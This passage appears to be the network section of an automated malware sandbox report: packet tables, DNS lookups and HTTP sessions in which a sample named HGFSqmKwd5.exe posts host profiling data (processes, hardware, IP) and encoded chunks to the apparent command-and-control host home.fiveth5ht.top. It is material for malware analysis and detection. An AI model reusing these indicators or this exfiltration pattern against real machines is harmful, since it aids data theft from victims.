Dec 28, 2024 09:48:26.073501110 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.073563099 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.073666096 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.073765993 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.073892117 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.073905945 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.074215889 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:26.082325935 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.082336903 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.082395077 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:26.082459927 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.082469940 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.082511902 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:26.082528114 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.082536936 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.082581997 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:26.082662106 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.082672119 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.082707882 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:26.082730055 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.082777977 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:26.082782984 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.082824945 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:26.082834959 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.082882881 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:26.082889080 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.082933903 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:26.082940102 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.082958937 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.082981110 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:26.083082914 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.083091974 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.083173990 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.083208084 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.083302975 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.083317995 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.083373070 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.083420038 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.083498001 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.083544016 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.083602905 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.083612919 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.083700895 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.083709955 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.083808899 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.083843946 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.084000111 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.084008932 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.084093094 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.084103107 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.084112883 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.084125042 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.084208012 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.084230900 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.084296942 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.084342957 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.084428072 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.084438086 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.084559917 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.114929914 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.120115042 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.120337009 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.120409966 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:26.120579958 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:26.192111015 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.192132950 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.192142963 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.192269087 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.192289114 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.192308903 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.192320108 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.192364931 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.192374945 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.193669081 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.193795919 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.193826914 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.193897009 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.193936110 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.193948030 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.193978071 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.194036961 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.194092989 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.194102049 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.194197893 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.194210052 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.194295883 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.194305897 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.194355011 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.194364071 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.194444895 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.194456100 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.194469929 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.194513083 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.194551945 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.194561958 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.194664001 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.194677114 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.194751024 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.194761992 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.201917887 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.201956987 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.201992035 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202002048 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202114105 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202124119 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202166080 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202195883 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202316046 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202369928 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202379942 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202389002 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202446938 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202457905 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202512026 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202548981 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202595949 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202668905 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202678919 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202688932 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202780008 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202791929 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202836037 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202874899 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202917099 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202929020 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.202994108 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.203113079 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.239948988 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.240067005 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.985717058 CET	49735	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:27.105448008 CET	80	49735	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:27.105633974 CET	49735	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:27.106024981 CET	49735	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:27.225528955 CET	80	49735	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:28.416431904 CET	80	49735	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:28.416487932 CET	80	49735	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:28.416620970 CET	49735	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:28.419030905 CET	49735	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:28.538490057 CET	80	49735	81.29.149.125	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 09:48:19.883821964 CET	52830	53	192.168.2.10	1.1.1.1
Dec 28, 2024 09:48:19.883997917 CET	52830	53	192.168.2.10	1.1.1.1
Dec 28, 2024 09:48:20.024972916 CET	53	52830	1.1.1.1	192.168.2.10
Dec 28, 2024 09:48:20.191701889 CET	53	52830	1.1.1.1	192.168.2.10
Dec 28, 2024 09:48:24.583621025 CET	52833	53	192.168.2.10	1.1.1.1
Dec 28, 2024 09:48:24.583755970 CET	52833	53	192.168.2.10	1.1.1.1
Dec 28, 2024 09:48:24.729592085 CET	53	52833	1.1.1.1	192.168.2.10
Dec 28, 2024 09:48:24.729605913 CET	53	52833	1.1.1.1	192.168.2.10
Dec 28, 2024 09:48:26.839060068 CET	52835	53	192.168.2.10	1.1.1.1
Dec 28, 2024 09:48:26.839112043 CET	52835	53	192.168.2.10	1.1.1.1
Dec 28, 2024 09:48:26.984515905 CET	53	52835	1.1.1.1	192.168.2.10
Dec 28, 2024 09:48:26.984541893 CET	53	52835	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 28, 2024 09:48:19.883821964 CET	192.168.2.10	1.1.1.1	0xd305	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:19.883997917 CET	192.168.2.10	1.1.1.1	0x18fc	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 28, 2024 09:48:24.583621025 CET	192.168.2.10	1.1.1.1	0x901	Standard query (0)	home.fiveth5ht.top	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:24.583755970 CET	192.168.2.10	1.1.1.1	0x8719	Standard query (0)	home.fiveth5ht.top	28	IN (0x0001)	false
Dec 28, 2024 09:48:26.839060068 CET	192.168.2.10	1.1.1.1	0x1981	Standard query (0)	home.fiveth5ht.top	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:26.839112043 CET	192.168.2.10	1.1.1.1	0x492	Standard query (0)	home.fiveth5ht.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 28, 2024 09:48:13.359368086 CET	1.1.1.1	192.168.2.10	0x34f9	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 28, 2024 09:48:13.359368086 CET	1.1.1.1	192.168.2.10	0x34f9	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:20.191701889 CET	1.1.1.1	192.168.2.10	0xd305	No error (0)	httpbin.org		34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:20.191701889 CET	1.1.1.1	192.168.2.10	0xd305	No error (0)	httpbin.org		3.218.7.103	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:24.729605913 CET	1.1.1.1	192.168.2.10	0x901	No error (0)	home.fiveth5ht.top		81.29.149.125	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:26.984515905 CET	1.1.1.1	192.168.2.10	0x1981	No error (0)	home.fiveth5ht.top		81.29.149.125	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.fiveth5ht.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49729	81.29.149.125	80	8076	C:\Users\user\Desktop\HGFSqmKwd5.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 09:48:24.852369070 CET	12360	OUT	POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 Host: home.fiveth5ht.top Accept: / Content-Type: application/json Content-Length: 498423 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 31 37 34 37 34 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8468739163627174741", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe" [TRUNCATED]
Dec 28, 2024 09:48:24.972105026 CET	4944	OUT	Data Raw: 6b 39 76 38 41 68 57 47 37 5c 2f 77 42 36 47 75 65 63 65 39 66 77 66 69 50 32 6d 66 30 49 73 4a 58 71 59 62 45 2b 4e 55 36 46 65 6d 37 54 70 31 50 44 50 78 66 6a 4a 64 55 31 66 67 43 30 6f 79 58 76 52 6e 46 75 4d 6f 74 53 69 33 46 70 76 2b 31 34 Data Ascii: k9v8AhWG7\/wB6Guece9fwfiP2mf0IsJXqYbE+NU6Fem7Tp1PDPxfjJdU1fgC0oyXvRnFuMotSi3Fpv+14fs6\/pjVKcatPwfjOnJXUo+IfhXJP7uOLprZppOLumk0fkPRX7M23\/BJQXH\/NwOz\/ALpTu\/8Aekr\/AJx61+UXxI8IH4e\/EPx74BbUBqx8D+NPFPhA6qLU2I1M+GtcvtFOoCyNxdmzF6bL7SLU3d19n8zyvt
Dec 28, 2024 09:48:24.972183943 CET	2472	OUT	Data Raw: 2b 34 39 36 66 74 4b 73 69 66 75 5c 2f 77 42 33 4c 5c 2f 33 2b 5c 2f 77 42 46 5c 2f 77 41 5c 2f 55 31 44 75 65 52 66 6b 5c 2f 64 63 43 4c 79 78 2b 5c 2f 77 44 5c 2f 41 4f 43 5c 2f 7a 31 6f 4e 52 6a 62 50 6e 52 33 5c 2f 41 48 50 39 50 58 33 39 50 Data Ascii: +496ftKsifu\/wB3L\/3+\/wBF\/wA\/U1DueRfk\/dcCLyx+\/wD\/AOC\/z1oNRjbPnR3\/AHP9PX39P85o\/i2fu\/3n+q\/e+n+f171JJ+72bJt7+b5ssn\/PH8u\/5YpPLj\/j+d\/+WUkn+v8A8\/yoOgD\/AAPv2eXF+6k\/0X+Xr2NVlkKsjv8A9O\/vP\/x9fXr9Ks+W7fx+ckn\/AC06fTOOKa8fzbEfzkEvf\/lj
Dec 28, 2024 09:48:24.972217083 CET	4944	OUT	Data Raw: 2f 6f 72 5c 2f 34 49 59 50 6a 77 56 2b 30 59 50 6d 34 38 56 66 44 6b 38 5a 37 36 52 34 74 39 41 66 53 76 35 55 2b 6d 56 72 34 4a 34 37 5c 2f 73 6f 75 48 5c 2f 41 50 31 49 71 6e 39 72 5c 2f 51 46 6b 33 39 49 58 4c 6b 37 66 38 6b 70 78 50 5c 2f 36 Data Ascii: /or\/4IYPjwV+0YPm48VfDk8Z76R4t9AfSv5U+mVr4J47\/souH\/AP1Iqn9r\/QFk39IXLk7f8kpxP\/6jUD9JfBf7VvjD4i+DPCXxA8G\/sdftN6x4S8d+GNB8ZeFdX\/t\/9kTT\/wC1PDfifSrTW9D1I2GqftWWWqWP27S761uvsmpWVnf23m+TeWtvcJJEnQH49fFPP\/JlX7TWAMf8jV+xt7EnH\/DWvpz9T+fwP42\/b
Dec 28, 2024 09:48:24.972280979 CET	2472	OUT	Data Raw: 58 7a 36 66 5c 2f 41 46 71 30 4e 4b 66 58 35 66 71 48 6c 75 30 6a 5c 2f 4c 76 38 76 4d 75 66 58 39 63 56 57 2b 65 54 39 32 36 65 57 5c 2f 38 41 79 79 38 76 2b 58 36 64 63 56 63 62 5c 2f 56 37 39 6d 36 48 7a 66 33 52 38 72 33 48 2b 65 5c 2f 38 41 Data Ascii: Xz6f\/AFq0NKfX5fqHlu0j\/Lv8vMufX9cVW+eT926eW\/8Ayy8v+X6dcVcb\/V79m6Hzf3R8r3H+e\/8AhD5fmbJvueZ\/q4\/9R\/o\/1zzjtQb878v6+ZWk+aT7+x\/9j\/ltnHp2\/r9KG2LvTZ\/rIsfvP\/Jv8f8APpT\/AC\/3cP7j5PeX9x9o\/X6f1FMWPdHvh+T96P8AWf6j\/wDV+dbe185f18zWl9n5\/qM+9+5
Dec 28, 2024 09:48:24.972333908 CET	4944	OUT	Data Raw: 55 49 53 6e 57 78 45 36 63 73 54 69 71 73 73 4e 52 6a 4f 76 57 71 56 47 72 79 6b 7a 2b 33 63 6c 38 49 75 4b 4f 45 73 67 77 47 56 31 38 35 70 38 57 59 6e 43 55 70 78 71 35 6a 79 66 55 63 52 58 35 71 31 53 72 47 4d 63 4a 57 71 56 49 55 71 47 48 68 Data Ascii: UISnWxE6csTiqssNRjOvWqVGrykz+3cl8IuKOEsgwGV185p8WYnCUpxq5jyfUcRX5q1SrGMcJWqVIUqGHhOOHw1GGLrOFCjThGyUYr5R\/aGv\/J8L6Pp6sQ19rQnYDGGhsbO4Dqc8\/666t347oOccH4\/27eMY7+tfRP7RWq2lx4g0LRre\/sbyTTNPu7mcWV1FdLFLqFykJjkaFnEcoXTkZoZAkqKyMyhXQn52r\/TD6POCo
Dec 28, 2024 09:48:24.972438097 CET	4944	OUT	Data Raw: 2f 43 72 55 6b 6e 33 30 48 7a 39 78 35 6b 76 37 6a 6a 5c 2f 41 44 33 5c 2f 41 4b 56 41 32 7a 7a 50 6e 53 56 5c 2f 33 51 38 33 5c 2f 77 43 76 79 63 66 30 4e 61 65 7a 38 5c 2f 77 5c 2f 34 4a 30 44 4a 50 4a 5c 2f 67 54 66 35 66 2b 66 62 30 5c 2f 6e Data Ascii: /CrUkn30Hz9x5kv7jj\/AD3\/AKVA2zzPnSV\/3Q83\/wCvycf0Naez8\/w\/4J0DJPJ\/gTf5f+fb0\/n6VDJsbe\/3PMlOJOn5f5Oam2ptT5ZHfPWP\/PH\/ANamddnyfJ5v7qP1\/D8PT9Kw5F5\/18jSn1+X6lOTzl+5MU8v\/nrF\/rvp\/n6ZqFvk+4hZ\/wDpp2+v+R0xV\/8AeR7N52P5Xr\/n\/OKhkhTa\/wAm\/j
Dec 28, 2024 09:48:25.092010975 CET	4944	OUT	Data Raw: 79 48 77 36 6c 6e 6d 4c 34 63 79 33 4d 63 58 6c 4e 62 41 38 4c 30 75 49 56 66 4f 71 47 46 7a 69 74 6a 6e 53 77 65 42 71 79 34 4a 78 46 53 72 6c 6b 38 78 57 44 79 33 45 35 54 6d 56 53 6e 68 63 4a 69 4b 75 50 6c 57 77 61 69 66 72 2b 48 39 54 57 6e Data Ascii: yHw6lnmL4cy3McXlNbA8L0uIVfOqGFzitjnSweBqy4JxFSrlk8xWDy3E5TmVSnhcJiKuPlWwaifr+H9TWnd6D4l0n4XePvizr9jpOi6J8Kf2kfEX7K3xM8PXOuLN4x8FfFHwpZ6JNr0mqWVrYS+HbjwtY6l4k0Lw4dc0zxTfPNruq2EcNjJpl3bapL0Vl8Ptdu9H\/Z48RXniX4aeF\/DX7S95+0OngLWPFnifxPG+maH+zH4B1
Dec 28, 2024 09:48:25.092134953 CET	2472	OUT	Data Raw: 37 76 34 6c 4f 6f 58 2b 38 66 77 5c 2f 6b 4b 75 73 43 33 35 35 71 50 59 66 62 5c 2f 50 34 55 47 39 4f 70 2b 74 6e 62 66 38 41 72 2b 76 4f 70 55 63 76 33 7a 5c 2f 6e 75 61 73 34 2b 5c 2f 33 7a 5c 2f 50 72 5c 2f 41 46 71 74 5c 2f 77 41 74 50 38 5c Data Ascii: 7v4lOoX+8fw\/kKusC355qPYfb\/P4UG9Op+tnbf8Ar+vOpUcv3z\/nuas4+\/3z\/Pr\/AFqt\/wAtP8\/3a29\/+7+JYyT7v3\/8\/mf8fw4qH89+f8+2Mf5xU8vf\/d\/xqDv\/AH\/z4\/mKxOgH6\/h\/U1Xfr+FS1BJ\/3x\/n\/Pv70HQV2D\/3Pk\/6Z59fb8P85pjZ7+o6f6\/p296sJ90fj\/M1FJH\/AH\/+2v8A
Dec 28, 2024 09:48:25.092149973 CET	4944	OUT	Data Raw: 38 7a 5c 2f 58 66 38 73 35 66 33 48 5c 2f 41 4e 61 6f 39 72 37 39 37 5c 2f 49 66 4f 38 72 39 35 5c 2f 79 31 5c 2f 6c 39 4f 76 38 36 50 5a 2b 66 34 66 38 45 42 6e 6c 5c 2f 75 34 55 5a 79 36 66 36 52 35 76 35 55 66 49 46 52 35 6e 38 76 5c 2f 6e 72 Data Ascii: 8z\/Xf8s5f3H\/ANao9r797\/IfO8r95\/y1\/l9Ov86PZ+f4f8EBnl\/u4UZy6f6R5v5UfIFR5n8v\/nr2\/wBH\/wA\/j+VEm+RXT7nXv\/kc8\/hTPMfh0+z+T6+V+4\/69bT\/ACc1mdBC33t6JInl\/p\/n\/PalKP8AwJs8z\/lp7j\/Papf9WqO\/mP8A89fMH5\/jj\/PSmeY+197\/AOr5iMn\/AD7\/APTpz9e34Z
Dec 28, 2024 09:48:25.092292070 CET	2472	OUT	Data Raw: 34 54 5a 52 56 7a 4c 41 35 4a 6a 63 69 79 44 47 30 63 37 7a 36 45 38 72 77 75 4b 78 57 4a 7a 47 6c 58 6d 6f 35 6a 66 47 34 72 43 35 74 6a 38 79 7a 4b 6c 50 47 79 78 46 4f 56 58 4d 4b 2b 47 72 55 36 32 41 6f 34 48 42 34 4f 76 58 6b 6e 78 33 30 79 Data Ascii: 4TZRVzLA5JjciyDG0c7z6E8rwuKxWJzGlXmo5jfG4rC5tj8yzKlPGyxFOVXMK+GrU62Ao4HB4OvXknx30y81j4QePdMsIjNeXmhvFBEM5d\/tNu+PlDH7qk8An2r3N9L3\/NBNG4645\/maoXGny7WjmtS0bjDpIodGXuGVgQw4zg5HSv3TF4SrisJisL8H1nD16CnyuSj7alKnzWUk3y817XV7aPqfzjkebxyzNsszWEY1amWZ
Dec 28, 2024 09:48:26.120115042 CET	212	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49735	81.29.149.125	80	8076	C:\Users\user\Desktop\HGFSqmKwd5.exe

Timestamp	Bytes transferred	Direction	Data
